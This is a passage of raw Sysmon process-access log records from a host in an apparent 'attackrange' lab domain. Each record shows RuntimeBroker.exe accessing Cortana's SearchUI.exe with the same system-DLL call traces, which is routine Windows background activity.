ernal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 